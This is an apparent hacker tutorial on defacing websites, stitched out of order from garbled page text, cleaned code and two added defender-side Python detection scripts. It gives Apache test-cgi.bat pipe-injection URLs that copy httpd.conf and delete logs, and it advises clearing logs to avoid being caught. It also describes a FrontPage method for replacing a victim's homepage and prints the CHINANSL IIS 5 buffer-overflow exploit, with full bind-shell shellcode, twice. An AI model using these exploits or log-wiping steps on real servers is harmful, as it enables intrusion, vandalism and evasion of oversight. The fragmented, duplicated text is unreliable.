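    r'"(?P<method>[A-Z]+) (?P<target>\S+)(?: HTTP/[\d.]+)?" (?P<status>\d{3})'
)
# DOS commands worth flagging after an injected pipe (assumption: extend for your site).
SHELL_CMDS = {"copy", "del", "type", "dir", "echo", "ren", "move", "cmd", "erase"}
# Apache configuration files that must never be reachable under the document root.
CONF_NAMES = {"httpd.conf", "access.conf", "srm.conf"}


def classify(line):
    """Return a finding dict for one log line, or None when nothing is suspicious."""
    m = LOG_RE.match(line)
    if not m:
        return None  # not Common Log Format; leave it alone
    # Undo %xx and '+' encoding so "%7CDEL+log" reads as "|DEL log".
    target = unquote_plus(m["target"])
    path = target.partition("?")[0]
    low = path.lower()
    base = {"host": m["host"], "status": int(m["status"]), "target": target}

    # 1. A batch file under cgi-bin with a pipe in the URL: everything after "|"
    #    is handed to cmd.exe, i.e. command injection.
    if "/cgi-bin/" in low and ".bat" in low:
        if "|" in target:
            after_pipe = target.split("|", 1)[1].strip()
            cmd = after_pipe.split()[0].lower() if after_pipe else ""
            if cmd in SHELL_CMDS:
                return {**base, "reason": "cgi-bat-pipe-injection",
                        "severity": "high", "command": cmd}
            return {**base, "reason": "cgi-bat-pipe", "severity": "medium", "command": cmd}
        # A plain hit on a leftover test script is not an attack by itself, but the
        # file should not exist on a production server at all.
        return {**base, "reason": "cgi-bat-invoked", "severity": "low", "command": ""}

    # 2. httpd.conf (or another config file) requested from the document root.
    #    A 200 means the copy trick already worked; a 404 is a probe.
    if low.rsplit("/", 1)[-1] in CONF_NAMES:
        sev = "high" if base["status"] == 200 else "medium"
        return {**base, "reason": "config-file-in-webroot", "severity": sev, "command": ""}
    return None


def scan(lines):
    """Classify every line; returns the findings in log order."""
    return [f for f in (classify(line) for line in lines) if f]


# Constructed sample log (not real traffic); lines 2 to 4 mirror the two URLs
# from the tutorial and the follow-up download of the copied file.
SAMPLE_LOG = [
    '203.0.113.7 - - [17/Feb/2006:04:18:45 +0000] "GET /index.html HTTP/1.1" 200 1532',
    '203.0.113.7 - - [17/Feb/2006:04:19:02 +0000] "GET /cgi-bin/test-cgi.bat|copy+conf%5Chttpd.conf+htdocs%5Chttpd.conf HTTP/1.1" 200 87',
    '203.0.113.7 - - [17/Feb/2006:04:19:10 +0000] "GET /httpd.conf HTTP/1.1" 200 34211',
    '203.0.113.7 - - [17/Feb/2006:04:25:33 +0000] "GET /cgi-bin/test-cgi.bat%7CDEL+log HTTP/1.1" 200 87',
    '198.51.100.2 - - [17/Feb/2006:04:30:00 +0000] "GET /cgi-bin/test-cgi.bat HTTP/1.1" 200 87',
]

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f"{f['severity']:6} {f['reason']:24} {f['host']:14} {f['target']}")
```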

In case of IIS on Windows 2000 you can use the following method to get a DOS shell through telnet.

The CHINANSL exploit code listed in the previous section exploits a buffer overflow in IIS 5 on Windows 2000 Server, opens port 1111 and binds a shell to it. If the exploit is successful then all you have to do is use telnet to connect to port 1111 of the target, and the system is yours.


IMPLEMENTATION OF THE CODE

To implement the C code you must compile it and run it. Now you must be wondering what the use of this code is. Actually, the C code causes an overflow in IIS on Windows 2000 and commands the system to bind a shell on port 1111. So once the exploit works there will be a shell bound on port 1111 on the target system. To work it out you must telnet to the target IP on port 1111; through this you will be connected to the system without any kind of authentication.
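The request the exploit above sends has a recognisable shape: a request-target padded out with 0x90 bytes and shellcode, and a chunked POST body whose chunks carry binary data rather than form fields. The following is an added defender-side example of mine (not code from the tutorial or from CHINANSL) that inspects a raw request for that shape, as a reverse-proxy or IDS hook might; the thresholds, the reason names and the sample requests are assumptions, and the samples contain no real shellcode.

```python
"""Request-shape inspection for the IIS 5 chunked-encoding exploit discussed
above.  Added defender example, not code from the tutorial; the thresholds and
the sample requests are this example's own assumptions, and the samples carry
no real shellcode."""
import re

# Chunk-size line: hex size, optional ";extension", CRLF.  No "^": match() anchors at pos.
CHUNK_SIZE_RE = re.compile(rb"([0-9A-Fa-f]+)(?:;[^\r\n]*)?\r\n")


def longest_run(data, byte):
    """Length of the longest run of one byte value (long 0x90 runs are NOP sleds)."""
    best = cur = 0
    for b in data:
        cur = cur + 1 if b == byte else 0
        best = max(best, cur)
    return best


def parse_chunks(body):
    """Decode a chunked body into its chunk payloads.
    Returns (chunks, truncated); truncated is True for a malformed size line or a
    chunk that claims more bytes than the buffer holds."""
    chunks, pos = [], 0
    while True:
        m = CHUNK_SIZE_RE.match(body, pos)
        if not m:
            return chunks, True
        size = int(m.group(1), 16)
        pos = m.end()
        if size == 0:
            return chunks, False  # terminating chunk
        if pos + size > len(body):
            chunks.append(body[pos:])
            return chunks, True
        chunks.append(body[pos:pos + size])
        pos += size + 2  # skip the CRLF that terminates the chunk


def is_binary(data):
    """True when any byte falls outside printable ASCII."""
    return any(b < 0x20 or b > 0x7e for b in data)


def inspect_request(raw, max_target=2048, sled_len=64):
    """Classify one raw HTTP request (bytes) and return the findings."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.split(b"\r\n")
    method, _, rest = lines[0].partition(b" ")
    target, _, version = rest.rpartition(b" ")
    if not version.startswith(b"HTTP/"):  # request line without a version field
        target = rest
    headers = {}
    for h in lines[1:]:
        name, _, value = h.partition(b":")
        headers[name.strip().lower()] = value.strip()
    chunked = headers.get(b"transfer-encoding", b"").lower() == b"chunked"
    chunks, truncated = parse_chunks(body) if chunked else ([], False)
    binary_chunks = sum(1 for c in chunks if is_binary(c))

    reasons = []
    if len(target) > max_target:
        reasons.append("oversized-request-target")
    if is_binary(target):
        reasons.append("binary-bytes-in-request-target")
    if longest_run(target, 0x90) >= sled_len:
        reasons.append("nop-sled-in-request-target")
    if chunked and binary_chunks:
        reasons.append("binary-data-in-chunked-body")
    if chunked and truncated:
        reasons.append("malformed-chunked-body")
    return {"method": method.decode("latin-1"), "target_len": len(target),
            "chunks": len(chunks), "binary_chunks": binary_chunks,
            "reasons": reasons, "verdict": "block" if reasons else "allow"}


# Constructed samples (no real shellcode).  The first mirrors the exploit's layout:
# a POST whose path is padded with 0x90 bytes, and a chunked body with a 16-byte
# binary chunk followed by two 4-byte chunks.  The second is an ordinary form post.
EXPLOIT_SHAPED = (
    b"POST /iisstart.asp" + b"\x90" * 300 + b"\xcc\xcc\xcc\xcc" + b" HTTP/1.1\r\n"
    + b"Accept: */*\r\nHost: 192.0.2.10\r\n"
    + b"Content-Type: application/x-www-form-urlencoded\r\n"
    + b"Transfer-Encoding: chunked\r\n\r\n"
    + b"10\r\n" + b"\xcc" * 16 + b"\r\n"
    + b"4\r\nAAAA\r\n4\r\nBBBB\r\n0\r\n\r\n\r\n"
)
BENIGN = (
    b"POST /search.asp HTTP/1.1\r\nHost: 192.0.2.10\r\n"
    b"Content-Type: application/x-www-form-urlencoded\r\n"
    b"Transfer-Encoding: chunked\r\n\r\n"
    b"c\r\nq=defacement\r\n0\r\n\r\n"
)

if __name__ == "__main__":
    for name, req in (("exploit-shaped", EXPLOIT_SHAPED), ("benign", BENIGN)):
        print(name, inspect_request(req))
```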

Various Security Measures

Website defacement has become a terrible problem for IT (Information Technology) based companies. Every day thousands of websites are defaced. Well, even government websites are defaced for different reasons; the most common reason is cyber war. Like in reality there are wars between two rival countries, similarly in the wired world there are cyber wars.

If you want to see the web attack archive, visit the following site:

http://defaced.alldas.org

Now some security measures for the system administrators:

- First of all you must coordinate and organize your web root with suitable directories. What I mean to say is that you must organize your files, like images in an image directory, one for server side contents, and so on and so forth. If you don't configure your web root properly then your web server will be prone to many attacks.
- You must be aware of the latest vulnerabilities; visit these sites:

http://www.securityfocus.com
http://www.packetstorm.org
http://www.guininski.com
http://www.insecure.org
http://www.securiteam.com
http://www.slashdot.org
http://www.technotronic.com

Well, every web server is vulnerable, but you must not fear; you must download the latest patches for the particular vulnerability. Well, the last thing is that you must be able to predict the moves of a malicious cracker or a script kiddie. You need to know how a cracker breaks into your site or web server, you need to know the motive behind the attack, and you must think, act and work like a hacker and take the cracker out from the root.

So this completes my tutorial on defacing websites. I hope you have understood the involutions of web servers.

Edit By S433D_ONLY_LINUX AND HACKFIRE TEAM

Page 10: Defacing Website

Server side pages like ASP PHP JSP or DLL are used in highly

advanced database driven dynamic websites which dynamically

generates the HTML and sends it to the client (web browser)

These server side pages and other executables including DLL and

EXE files needs execution perquisites in the virtual directory

where they are kept

NOTE DLL EXE etc need execution perquisites they are kept in a

single virtual directory

DIRECTORY SURFING

It has been often seen that web servers to be more specific

virtual directories of web servers are configured as such to

provide directory surfing access to all clients or special clients

through proper authentications Actually directory browsing

means that you can list the file and folders present in your virtual

directory just as you see in your standalone system Well most of

the web server administrators turn off this feature But exploit

codes can be used to get directory listing of the virtual directory

EXPLOIT FOR DIRECTORY LISTING IN APACHE

Well if you are not familiar with apache then let me give you a

brief description Apache is a server in which you have to

configure your web server using command and scripts These

scripts and commands are kept in httpdconf file in capache

groupapacheconf folder default Apache installation on a

distinctive windows system This file contains all the settings of

the web server and if we get our hands into this file then we get

to know all the settings of the web server including the location of

log files directory permissions write access authentication levels

etc

So now letrsquos get on with the exploit As we know that Apache is

the most preferred web server This web server has a bat in its

cgi-bin directory This bat file is named as test-cgibat Actually

the motive of the bat file is to test the privileges of cgi-bin

directory

NOTE cgi-bin directory contains all the CGI and Perl scripts

Well it is quiet obvious that cgi-bin virtual directory has execution

permissions These conditions are exploited to perform out

pernicious attacks The bat file in Apache web server is called as

execution of DOS (Disk Operating Systems) The DOS shell is

spawned to it for execution Now we can use | (pipe) character

along with the batch file to execute commands on the remote

server

NOTE If you donrsquot know how to put the | (pipe) character then

donrsquot worry To put the pipe character press Alt+ the

character is just beside your backspace key

So the attack URL will be like this

httpwwwtargetcomcgi-bintest-cgibat|copy+confhttpd

conf+htdocshttpdconf

Through the above URL I have copied the httpdconf file from the

conf directory The conf directory mostly does not have read

access to the Apache web root that is htdocs virtual folder Now

we can easily download the httpdconf file using the following

URL

httptargetcomhttpdconf

Since it occupies in the Apache web root Through this method

you will get the httpdconf file and through the httpdconf file you

can get some worthful information about the web server

Inspecting known vulnerabilities

Generally websites are defaced and hacked using vulnerabilities

related with the server software or the Operating System running

the server software Well most of the lsquohackersrsquo deface websites

using vulnerabilities Please note I am talking about hackers not

script kiddies who deface websites using uncanny softwares So

you must know what vulnerability is well if you donrsquot know then

let me tell you all Vulnerability is an existing flaw or defect in the

software architecture which allows a hacker or cracker to take

control over the system or issue capricious system commands to

the server In every software or application or tool vulnerabilities

persist

httpwwwsecurityfocuscom

httpwwwpacketstormorg

httpwwwguininskicom

httpwwwinsecureorg

httpwwwsecuriteamcom

httpwwwslashdotorg

httpwwwtechnotroniccom

The above sites contain latest vulnerabilities with exploit codes

Even if you are an elite or a professional you will find the

information useful

Working with Exploits

Well I must say this is the most exciting part of this tutorial

Okay so wwwvictimcom is the target site Well through the

above methods I mean the methods I have explained earlier in

the tutorial through those methods we have found out that the

website is functioning in Microsoft IIS server software So it is

time to find some vulnerability I am using Acutenix Web Security

Scanner to scan for vulnerabilities You guys must know

programming languages like Perl or Socket Programming or C this

is essential because through this you will be able to compile the

exploits So once you get vulnerability try exploiting it by

executing it in your client (browser)

MICROSOFT FRONPAGE EXTENSION EXPLOIT

This is one of the methods for website defacement using Microsoft

Web Publishing Wizard Using this method one can deface

Websites having FrontPage Server extensions By using Microsoft

Web Publishing Wizard one can replace FrontPage Server

extension pages

Follow the steps given below to execute the following exploit

Telnet the Target website or web server in port 80

CTelnet wwwvictimcom 80

You will get a blank screen type GET and continue pressing

enter till the web server responds to your requests

GET ltENTERgtltENTERgt

NOTE Web servers functioning in IIS server have FrontPage

Extensions enabled by default

So After pressing enter you will get the following

HTTP11 400 Bad Request

Server Microsoft-IIS50

Date Thu 17 Feb 2006 041845 GMT

Content-Type texthtml

Content-Length 87

Once you get the HTTP Bad Request you have search for the

homepage Most of the sites have the default homepage as

httpwwwvictimservercommainasp

httpwwwvictimservercomindexhtml

httpwwwvictimservercomindexhtm

httpwwwvictimservercomindexasp

httpwwwvictimservercommainhtm

httpwwwvictimservercommainhtm

httpwwwvictimservercomdefaulthtm

httpwwwvictimservercomdefaultasp

httpwwwvictimservercomdefaulthtml

Keep assaying all possible FrontPage Extensions unless the page

loads If the extension doesnrsquot exist then it will give a 404 Error

Let us say you have got the homepage as

wwwvictimcomindexhtml so design the page which you want

upload or modify the homepage Here the homepage is indexhtml

once you design the page or modify the page save it as

indexhtml

Now open Web Publishing Wizard and follow the steps given

below

- Open Microsoft Web Publishing Wizard

- Now browse the file that you are going to upload Here

indexhtml is the file which we are going to upload

- Now you get a screen where you have to name the web server

Type in anything and click on Advanced

- Select the service provider from the drop down box This is

nothing but the kind of uploading it is going to do Since your

motive is to deface the site select the FrontPage Extended Web

option since this method of defacing works only for FrontPage

enabled sites

- Type the URL of the victim server homepage and in the given

box here it is wwwvictimcomindexhtml

- Here specify the URL that you type in the Web browser to access

the victim server website

- Select the connection method that you use to access the internet

- Click Finish Voila you have successfully replaced the victimrsquos

homepage with yours

Overworking known vulnerabilities to break into a server

Before going deep into vulnerabilities you must know some

coding exploits I am going to present some exploit codes written

in the most powerful programming language C

Windows 2000 Server Exploit By CHINANSL Security Team

Test on Windows 2000 Chinese Version IIS 50 not patched

WarningTHIS PROGRAM WILL ONLY TEST

CHINANSL Technology COLTD httpwwwchinanslcom

kejichinanslcom

use MS VC++ to compile this piece of code

include stdafxh

include ltstdiohgt

include ltstdlibhgt

include ltstringhgt

include ltwindowshgt

pragma comment (libWs2_32)

int main(int argc char argv[])

if(argc = 4)

printf(s ip port aspfilepathnnargv[0])

printf( ie s 127001 80 iisstartaspnargv[0])

puts( programed by kejichinanslcom)

return 0

DWORD srcdata=0x01e2fb1c-40x00457474

address of SHELLCODE

DWORD jmpaddr=0x00457494 0x77ebf094 0x01e6fcec

x1cxfbxe6x01 x0cxfbxe6x01

char destIP=argv[1]

char destFile=argv[3]

int webport=atoi(argv[2])

char pad=xccxccxccxcc ADPA x02x02x02x02 PADP 16 bytes

WSADATA ws

SOCKET s

long result=0

if(WSAStartup(0x0101ampws) = 0)

puts(WSAStartup() error)

return -1

struct sockaddr_in addr

addrsin_family=AF_INET

addrsin_port=htons(webport)

addrsin_addrs_addr=inet_addr(destIP)

s=socket(AF_INETSOCK_STREAM0)

if(s==-1)

puts(Socket create error)

return -1

if(connect(s(struct sockaddr )ampaddrsizeof(addr)) == -1)

puts(Cannot connect to the specified host)

return -1

char buff[4096]

char

shellcode=x55x8bxecx33xc0xb0xf0xf7xd8x03xe0x8bxfcx33xc9x8

9

x8dx2cxffxffxffxb8x6bx65x72x6exabxb8x65x6cx33x32

xabx32xc0xaaxb8x77x73x6fx63xabxb8x6bx33x32x2exab

x4fx32xc0xaax8dx7dx80xb8x63x6dx64x2exabx32xc0x4f

xaaxb8x23x80xe7x77x8dx9dx10xffxffxffx53xffxd0x89

x45xfcxb8x23x80xe7x77x8dx9dx19xffxffxffx53xffxd0

x89x45xf8xbbx4bx56xe7x77x6ax47xffx75xfcxffxd3x89

x45xf4x6ax48xffx75xfcxffxd3x89x45xf0x33xf6x66xbe

x1dx02x56xffx75xfcxffxd3x89x45xecx66xbex3ex02x56

xffx75xfcxffxd3x89x45xe8x66xbex0fx03x56xffx75xfc

xffxd3x89x45xe4x66xbex9dx01x56xffx75xfcxffxd3x89

x85x34xffxffxffx66xbexc4x02x56xffx75xfcxffxd3x89

x85x28xffxffxffx33xc0xb0x8dx50xffx75xfcxffxd3x89

x85x18xffxffxffx6ax73xffx75xf8xffxd3x89x45xe0x6a

x17xffx75xf8xffxd3x89x45xdcx6ax02xffx75xf8xffxd3

x89x45xd8x33xc0xb0x0ex48x50xffx75xf8xffxd3x89x45

xd4x6ax01xffx75xf8xffxd3x89x45xd0x6ax13xffx75xf8

xffxd3x89x45xccx6ax10xffx75xf8xffxd3x89x45xc8x6a

x03xffx75xf8xffxd3x89x85x1cxffxffxffx8dx7dxa0x32

xe4xb0x02x66xabx66xb8x04x57x66xabx33xc0xabxf7xd0

xabxabx8dx7dx8cx33xc0xb0x0exfexc8xfexc8xabx33xc0

xabx40xabx8dx45xb0x50x33xc0x66xb8x01x01x50xffx55

xe0x33xc0x50x6ax01x6ax02xffx55xdcx89x45xc4x6ax10

x8dx45xa0x50xffx75xc4xffx55xd8x6ax01xffx75xc4xff

x55xd4x33xc0x50x50xffx75xc4xffx55xd0x89x45xc0x33

xffx57x8dx45x8cx50x8dx45x98x50x8dx45x9cx50xffx55

xf4x33xffx57x8dx45x8cx50x8dx45x90x50x8dx45x94x50

xffx55xf4xfcx8dxbdx38xffxffxffx33xc9xb1x44x32xc0

xf3xaax8dxbdx38xffxffxffx33xc0x66xb8x01x01x89x47

x2cx8bx45x94x89x47x38x8bx45x98x89x47x40x89x47x3c

xb8xf0xffxffxffx33xdbx03xe0x8bxc4x50x8dx85x38xff

xffxffx50x53x53x53x6ax01x53x53x8dx4dx80x51x53xff

x55xf0x33xc0xb4x04x50x6ax40xffx95x34xffxffxffx89

x85x30xffxffxffx90x33xdbx53x8dx85x2cxffxffxffx50

x53x53x53xffx75x9cxffx55xecx8bx85x2cxffxffxffx85

xc0x74x49x33xdbx53xb7x04x8dx85x2cxffxffxffx50x53

xffxb5x30xffxffxffxffx75x9cxffx55xe8x85xc0x74x6d

x33xc0x50xffxb5x2cxffxffxffxffxb5x30xffxffxffxff

x75xc0xffx55xccx83xf8xffx74x53xebx10x90x90x90x90

x90x90x6ax32xffx95x28xffxffxffxebx99x90x90x33xc0

x50xb4x04x50xffxb5x30xffxffxffxffx75xc0xffx55xc8

x83xf8xffx74x28x89x85x2cxffxffxffx33xc0x50x8dx85

x2cxffxffxffx50xffxb5x2cxffxffxffxffxb5x30xffxff

xffxffx75x90xffx55xe4x85xc0x74x02xebxb4xffx75xc4

xffx95x1cxffxffxffxffx75xc0xffx95x1cxffxffxffx6a

xffxffx95x18xffxffxff

char s1=POST HTTP11rn

char s2=Accept rn

char s4=Content-Type applicationx-www-

form-urlencodedrn

char s5=Transfer-Encoding

chunkedrnrn

char sc=0rnrnrn

char shellcodebuff[10248]

memset(shellcodebuff0x90sizeof

(shellcodebuff))

memcpy(ampshellcodebuff[sizeof(shellcodebuff)-

strlen(shellcode)-1]shellcodestrlen(shellcode))

shellcodebuff[sizeof(shellcodebuff)-1] = 0

char sendbuff[102416]

memset(sendbuff0102416)

sprintf(sendbuffsss HTTP11rnsHost

srnss10rnsrn4rnAAAArn4rnBBBBrns s1 destFile

shellcodebuff s2 destIP s4s 5 padsrcdatajmpaddr sc)

int sendlen=strlen(sendbuff)

(DWORD )strstr(sendbuffBBBB) = jmpaddr

(DWORD )strstr(sendbuffAAAA) = srcdata

result=send(ssendbuffsendlen0)

if(result == -1 )

puts(Send shellcode error)

return -1

memset(buff04096)

result=recv(sbuffsizeof(buff)0)

if(strstr(bufflthtmlgt) = NULL)

shutdown(s0)

closesocket(s)

puts(Send shellcode errorTry again)

return -1

shutdown(s0)

closesocket(s)

printf(nUse lttelnet s 1111gt to connect to the hostndestIP)

puts(If you cannot connect to the hosttry run this program again)

return 0

The above code is called as an exploit code these are written in

powerful programming languages like C Perl or sometimes JAVA

Exploit Codes are written according to the vulnerability

Vulnerabilities were discovered in the past nowadays it has been

seen that server softwares and operating systems are patched for

these vulnerabilities So you canrsquot just execute exploit code to

break into a server you must overwork an exploit code so that it

works according to your needs One more thing I must mention is

that you must keep yourself updated with latest vulnerabilities by

visiting the sites that I have mentioned earlier in the tutorial

Well I think its better that you code your own exploit code in Perl

or C in order to break into websites

NOTE I am talking about high profile websites I am not talking

about lame websites coded in notepad

Keeping yourself safe

Well you must be familiar with server softwares like Apache

Microsoft IIS etc So you must be knowing about the log files

which records each and every request made by the server As it

records everything system administrators will have no problem

catching the malicious cracker or script kiddie as the log file will

have the IP (Internet Protocol) address and through the IP

address you can trace the cracker or the script kiddie

NOTE Read my tutorial on Gathering Information of Remote Host

TIP If you do not want to get busted you must clear the log files

after you break into a web server

CLEARING LOGS

You must clear yoursquore the logs in order to save yourself from

getting busted So you can use cross site scripting vulnerability

to clear the log files You can do by executing the following URL

httpwwwtargetcomcgi-bintest-cgibat|DEL+log

NOTE The above URL can be used in Apache server software

In case of IIS on Windows 2000 you can use the following method

to get a DOS Shell through telnet

The Following code exploits a buffer overflow in IIS 5 on Windows

2000 server and opens port 1111 and binds a shell to it If the

exploit is successful then all you have to do is use telnet to

connect to port 1111 of target and the system is yours

/*
 Windows 2000 Server Exploit By CHINANSL Security Team
 Test on Windows 2000 Chinese Version, IIS 5.0, not patched.
 Warning: THIS PROGRAM WILL ONLY TEST!
 CHINANSL Technology CO.,LTD  http://www.chinansl.com
 keji@chinansl.com
*/
/* Compile as C++ with Microsoft Visual C++. The original #include "stdafx.h"
   (MSVC precompiled header) has been dropped; nothing in the file depends on it. */
#include <winsock2.h>
#include <windows.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#pragma comment (lib,"Ws2_32")

int main(int argc, char* argv[])
{
    if(argc != 4)
    {
        printf("%s ip port aspfilepath\n\n",argv[0]);
        printf(" ie. %s 127.0.0.1 80 /iisstart.asp\n",argv[0]);
        puts(" programed by keji@chinansl.com");
        return 0;
    }

    /* Both values are specific to the Chinese Windows 2000 / IIS 5.0 build the authors
       tested on; the commented alternatives are the other candidates they tried.
       A wrong pair does not give a shell, it crashes the IIS process. */
    DWORD srcdata=0x01e2fb1c-4;   /* 0x00457474 */
    /* address of SHELLCODE */
    DWORD jmpaddr=0x00457494;     /* 0x77ebf094; 0x01e6fcec; "\x1c\xfb\xe6\x01"; "\x0c\xfb\xe6\x01" */

    char* destIP=argv[1];
    char* destFile=argv[3];
    int webport=atoi(argv[2]);
    char* pad="\xcc\xcc\xcc\xcc" "ADPA" "\x02\x02\x02\x02" "PADP";   /* 16 bytes */

    WSADATA ws;
    SOCKET s;
    long result=0;
    if(WSAStartup(0x0101,&ws) != 0)
    {
        puts("WSAStartup() error");
        return -1;
    }

    struct sockaddr_in addr;
    addr.sin_family=AF_INET;
    addr.sin_port=htons(webport);
    addr.sin_addr.s_addr=inet_addr(destIP);

    s=socket(AF_INET,SOCK_STREAM,0);
    if(s==INVALID_SOCKET)
    {
        puts("Socket create error");
        return -1;
    }

    if(connect(s,(struct sockaddr *)&addr,sizeof(addr)) == SOCKET_ERROR)
    {
        puts("Cannot connect to the specified host");
        return -1;
    }

    char buff[4096];
    /* Bind-shell payload. It loads kernel32/wsock32 through hard-coded kernel32
       addresses (another build dependency), listens on TCP port 1111 (0x0457 in
       network order: "\x66\xb8\x04\x57"), accepts one connection and starts cmd.exe
       with its standard handles redirected to pipes that are relayed to the socket. */
    char* shellcode=
    "\x55\x8b\xec\x33\xc0\xb0\xf0\xf7\xd8\x03\xe0\x8b\xfc\x33\xc9\x89"
    "\x8d\x2c\xff\xff\xff\xb8\x6b\x65\x72\x6e\xab\xb8\x65\x6c\x33\x32"
    "\xab\x32\xc0\xaa\xb8\x77\x73\x6f\x63\xab\xb8\x6b\x33\x32\x2e\xab"
    "\x4f\x32\xc0\xaa\x8d\x7d\x80\xb8\x63\x6d\x64\x2e\xab\x32\xc0\x4f"
    "\xaa\xb8\x23\x80\xe7\x77\x8d\x9d\x10\xff\xff\xff\x53\xff\xd0\x89"
    "\x45\xfc\xb8\x23\x80\xe7\x77\x8d\x9d\x19\xff\xff\xff\x53\xff\xd0"
    "\x89\x45\xf8\xbb\x4b\x56\xe7\x77\x6a\x47\xff\x75\xfc\xff\xd3\x89"
    "\x45\xf4\x6a\x48\xff\x75\xfc\xff\xd3\x89\x45\xf0\x33\xf6\x66\xbe"
    "\x1d\x02\x56\xff\x75\xfc\xff\xd3\x89\x45\xec\x66\xbe\x3e\x02\x56"
    "\xff\x75\xfc\xff\xd3\x89\x45\xe8\x66\xbe\x0f\x03\x56\xff\x75\xfc"
    "\xff\xd3\x89\x45\xe4\x66\xbe\x9d\x01\x56\xff\x75\xfc\xff\xd3\x89"
    "\x85\x34\xff\xff\xff\x66\xbe\xc4\x02\x56\xff\x75\xfc\xff\xd3\x89"
    "\x85\x28\xff\xff\xff\x33\xc0\xb0\x8d\x50\xff\x75\xfc\xff\xd3\x89"
    "\x85\x18\xff\xff\xff\x6a\x73\xff\x75\xf8\xff\xd3\x89\x45\xe0\x6a"
    "\x17\xff\x75\xf8\xff\xd3\x89\x45\xdc\x6a\x02\xff\x75\xf8\xff\xd3"
    "\x89\x45\xd8\x33\xc0\xb0\x0e\x48\x50\xff\x75\xf8\xff\xd3\x89\x45"
    "\xd4\x6a\x01\xff\x75\xf8\xff\xd3\x89\x45\xd0\x6a\x13\xff\x75\xf8"
    "\xff\xd3\x89\x45\xcc\x6a\x10\xff\x75\xf8\xff\xd3\x89\x45\xc8\x6a"
    "\x03\xff\x75\xf8\xff\xd3\x89\x85\x1c\xff\xff\xff\x8d\x7d\xa0\x32"
    "\xe4\xb0\x02\x66\xab\x66\xb8\x04\x57\x66\xab\x33\xc0\xab\xf7\xd0"
    "\xab\xab\x8d\x7d\x8c\x33\xc0\xb0\x0e\xfe\xc8\xfe\xc8\xab\x33\xc0"
    "\xab\x40\xab\x8d\x45\xb0\x50\x33\xc0\x66\xb8\x01\x01\x50\xff\x55"
    "\xe0\x33\xc0\x50\x6a\x01\x6a\x02\xff\x55\xdc\x89\x45\xc4\x6a\x10"
    "\x8d\x45\xa0\x50\xff\x75\xc4\xff\x55\xd8\x6a\x01\xff\x75\xc4\xff"
    "\x55\xd4\x33\xc0\x50\x50\xff\x75\xc4\xff\x55\xd0\x89\x45\xc0\x33"
    "\xff\x57\x8d\x45\x8c\x50\x8d\x45\x98\x50\x8d\x45\x9c\x50\xff\x55"
    "\xf4\x33\xff\x57\x8d\x45\x8c\x50\x8d\x45\x90\x50\x8d\x45\x94\x50"
    "\xff\x55\xf4\xfc\x8d\xbd\x38\xff\xff\xff\x33\xc9\xb1\x44\x32\xc0"
    "\xf3\xaa\x8d\xbd\x38\xff\xff\xff\x33\xc0\x66\xb8\x01\x01\x89\x47"
    "\x2c\x8b\x45\x94\x89\x47\x38\x8b\x45\x98\x89\x47\x40\x89\x47\x3c"
    "\xb8\xf0\xff\xff\xff\x33\xdb\x03\xe0\x8b\xc4\x50\x8d\x85\x38\xff"
    "\xff\xff\x50\x53\x53\x53\x6a\x01\x53\x53\x8d\x4d\x80\x51\x53\xff"
    "\x55\xf0\x33\xc0\xb4\x04\x50\x6a\x40\xff\x95\x34\xff\xff\xff\x89"
    "\x85\x30\xff\xff\xff\x90\x33\xdb\x53\x8d\x85\x2c\xff\xff\xff\x50"
    "\x53\x53\x53\xff\x75\x9c\xff\x55\xec\x8b\x85\x2c\xff\xff\xff\x85"
    "\xc0\x74\x49\x33\xdb\x53\xb7\x04\x8d\x85\x2c\xff\xff\xff\x50\x53"
    "\xff\xb5\x30\xff\xff\xff\xff\x75\x9c\xff\x55\xe8\x85\xc0\x74\x6d"
    "\x33\xc0\x50\xff\xb5\x2c\xff\xff\xff\xff\xb5\x30\xff\xff\xff\xff"
    "\x75\xc0\xff\x55\xcc\x83\xf8\xff\x74\x53\xeb\x10\x90\x90\x90\x90"
    "\x90\x90\x6a\x32\xff\x95\x28\xff\xff\xff\xeb\x99\x90\x90\x33\xc0"
    "\x50\xb4\x04\x50\xff\xb5\x30\xff\xff\xff\xff\x75\xc0\xff\x55\xc8"
    "\x83\xf8\xff\x74\x28\x89\x85\x2c\xff\xff\xff\x33\xc0\x50\x8d\x85"
    "\x2c\xff\xff\xff\x50\xff\xb5\x2c\xff\xff\xff\xff\xb5\x30\xff\xff"
    "\xff\xff\x75\x90\xff\x55\xe4\x85\xc0\x74\x02\xeb\xb4\xff\x75\xc4"
    "\xff\x95\x1c\xff\xff\xff\xff\x75\xc0\xff\x95\x1c\xff\xff\xff\x6a"
    "\xff\xff\x95\x18\xff\xff\xff";

    char* s1="POST ";   /* " HTTP/1.1\r\n" is supplied by the format string below */
    char* s2="Accept: */*\r\n";
    char* s4="Content-Type: application/x-www-form-urlencoded\r\n";
    char* s5="Transfer-Encoding: chunked\r\n\r\n";
    char* sc="0\r\n\r\n\r\n";

    /* 8 KB of NOPs with the shellcode at the end; this goes into the request line
       right after the .asp path. */
    char shellcodebuff[1024*8];
    memset(shellcodebuff,0x90,sizeof(shellcodebuff));
    memcpy(&shellcodebuff[sizeof(shellcodebuff)-strlen(shellcode)-1],shellcode,strlen(shellcode));
    shellcodebuff[sizeof(shellcodebuff)-1] = 0;

    /* Chunked body: one 16-byte chunk (pad), then two 4-byte chunks that are
       patched below with srcdata and jmpaddr, then the terminating zero chunk. */
    char sendbuff[1024*16];
    memset(sendbuff,0,1024*16);
    sprintf(sendbuff,
            "%s%s%s HTTP/1.1\r\n%sHost: %s\r\n%s%s10\r\n%s\r\n4\r\nAAAA\r\n4\r\nBBBB\r\n%s",
            s1,destFile,shellcodebuff,s2,destIP,s4,s5,pad,sc);
    int sendlen=strlen(sendbuff);
    *(DWORD*)strstr(sendbuff,"BBBB") = jmpaddr;
    *(DWORD*)strstr(sendbuff,"AAAA") = srcdata;

    result=send(s,sendbuff,sendlen,0);
    if(result == SOCKET_ERROR)
    {
        puts("Send shellcode error");
        return -1;
    }

    memset(buff,0,4096);
    result=recv(s,buff,sizeof(buff),0);
    /* A normal HTML reply means asp.dll served the request, i.e. the overflow did not hit. */
    if(strstr(buff,"<html>") != NULL)
    {
        shutdown(s,0);
        closesocket(s);
        puts("Send shellcode error!Try again!");
        return -1;
    }

    shutdown(s,0);
    closesocket(s);
    printf("\nUse <telnet %s 1111> to connect to the host\n",destIP);
    puts("If you cannot connect to the host,try run this program again!");
    return 0;
}

IMPLEMENTATION OF THE CODE

